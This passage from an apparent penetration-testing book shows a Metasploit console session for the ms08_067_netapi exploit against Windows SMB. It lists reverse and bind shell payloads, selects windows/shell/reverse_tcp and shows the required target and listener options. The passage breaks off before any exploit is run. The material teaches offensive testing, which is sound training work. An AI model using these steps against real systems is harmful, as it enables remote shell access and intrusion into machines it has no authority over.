The Joy of Exploitation
61
msf exploit(ms08_067_netapi) >
show payloads
Compatible Payloads
===================
Name Rank Description
----
----
-----------
. . . SNIP . . .
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP
Stager (IPv6)
windows/shell/reverse_nonx_tcp
normal Windows Command Shell, Reverse TCP
Stager (No NX or Win7)
windows/shell/reverse_ord_tcp
normal Windows Command Shell, Reverse
Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp
normal Windows Command Shell, Reverse TCP
Stager
windows/shell/reverse_tcp_allports
normal Windows Command Shell, Reverse
All-Port TCP Stager
windows/shell_bind_tcp
normal Windows Command Shell, Bind TCP
Inline
windows/shell_reverse_tcp
normal Windows Command Shell, Reverse TCP
Inline
Next, we enter
set payload windows/shell/reverse_tcp
to select the
reverse_tcp
payload. When we enter
show options
again we see that additional options
are shown:
msf exploit(ms08_067_netapi) >
set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) >
show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port